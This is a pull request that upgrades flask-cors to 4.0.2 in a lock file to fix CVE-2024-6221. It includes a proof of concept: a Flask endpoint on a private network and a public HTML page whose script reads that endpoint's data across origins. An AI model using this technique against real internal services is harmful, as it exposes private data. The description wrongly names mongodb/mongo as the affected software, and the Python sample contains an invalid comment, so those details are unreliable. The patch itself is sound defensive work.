### PR TITLE
Fix: flask allows the `Access-Control-Allow-Private-Network` CORS header to be set to true by default

### DIFF
--- a/poetry.lock
+++ b/poetry.lock
@@ -919,13 +919,13 @@ dotenv = ["python-dotenv"]
 
 [[package]]
 name = "flask-cors"
-version = "4.0.1"
+version = "4.0.2"
 description = "A Flask extension adding a decorator for CORS support"
 optional = true
 python-versions = "*"
 files = [
-    {file = "Flask_Cors-4.0.1-py2.py3-none-any.whl", hash = "sha256:f2a704e4458665580c074b714c4627dd5a306b333deb9074d0b1794dfa2fb677"},
-    {file = "flask_cors-4.0.1.tar.gz", hash = "sha256:eeb69b342142fdbf4766ad99357a7f3876a2ceb77689dc10ff912aac06c389e4"},
+    {file = "Flask_Cors-4.0.2-py2.py3-none-any.whl", hash = "sha256:38364faf1a7a5d0a55bd1d2e2f83ee9e359039182f5e6a029557e1f56d92c09a"},
+    {file = "flask_cors-4.0.2.tar.gz", hash = "sha256:493b98e2d1e2f1a4720a7af25693ef2fe32fbafec09a2f72c59f3e475eda61d2"},
 ]
 
 [package.dependencies]


### PR DESCRIPTION
A vulnerability in `mongodb/mongo` version [r7.0.15-rc1](https://github.com/mongodb/mongo/releases/tag/r7.0.15-rc1) allows the Access-Control-Allow-Private-Network CORS header to be set to true by default, without any configuration option. This behavior can expose private network resources to unauthorized external access, leading to significant security risks such as data breaches, unauthorized access to sensitive information, and potential network intrusions.


## Proof of Concept
```py
// Host this in your local network.
from flask import Flask, jsonify
import logging
try:
    # The typical way to import flask-cors
    from flask_cors import cross_origin
except ImportError:
    # Path hack allows examples to be run without installation.
    import os
    parentdir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
    os.sys.path.insert(0, parentdir)

    from flask_cors import cross_origin


app = Flask('FlaskCorsViewBasedExample')
logging.basicConfig(level=logging.INFO)


@app.route("/SecretInformationFromPrivateNetwork", methods=['GET'])
@cross_origin()
def secretStuff():
    return "Super Secret Confidential stuff"



if __name__ == "__main__":
    app.run(debug=True)
```
```
// Host this in a public network
<html>
    <head>
        <title>TrustedSec CORS POC</title>
    </head>
    <body>
        <h1>TrustedSec CORS POC</h>
        <script>
var xhr = new XMLHttpRequest();
var url = 'http://<PrivateNetwork>/SecretInformationFromPrivateNetwork'; 

xhr.open('GET', url, true);
xhr.onreadystatechange = function() {
    if (xhr.readyState === 4 && xhr.status === 200) {
        console.log(xhr.responseText);
    }
};
xhr.send();


        </script>
    </body>
</html>
```
[CVE-2024-6221](https://nvd.nist.gov/vuln/detail/CVE-2024-6221)
[CWE-284](https://cwe.mitre.org/data/definitions/284.html)